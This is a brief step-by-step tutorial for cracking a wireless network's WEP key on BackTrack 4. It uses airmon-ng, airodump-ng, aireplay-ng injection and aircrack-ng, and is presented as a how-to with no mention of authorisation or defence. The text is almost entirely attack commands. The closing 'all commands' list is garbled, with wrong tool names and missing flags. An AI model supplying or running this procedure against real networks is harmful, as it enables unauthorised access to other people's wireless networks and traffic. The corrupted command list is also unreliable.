Hack wifi WEP

Backtrack4 – how hack wireless

startx
terminal -> /etc/init.d/networking start
airmon-ng
**airmon-ng stop (wireless card name) exp.:
airmon-ng stop wlan0
airmon-ng start wlan0
airmon-ng (now we show changes)
airodum-ng wlan0
//now see all wireless sites with more optins (bssid, essid,

channel…)//

**airodump-ng -w wep -c (channel number) –bssid (bssid number)

(wireless card name)

open nem terminal

aireplay-ng -1 0 -a (bssid) (wireless card name)

open new terminal (this will be sending and receiving console)

aireplay-ng -3 -b (bssid) (wireless card name)

now back into the first terminal session, and there show network

connection, we must run until data > 30 000

in the third open console, stop the trafic ctrl+c, and write dir
here is some file with .cap

aircrack-ng (filename).cap

and there is a wireless key

ALL COMMANDS FROM AUTHOR:

Startx
/ etc / init.d / networking start
aircrack-ng
aircrack-ng stop [wireless card name]
aircrack-ng start [wireless card name]
aircrack-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng wep w c [channel number] bssid [bssid number]

[wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid] [wireless card name]
ctrl + c
dir
aircrack-ng [filename]

—-


Have your say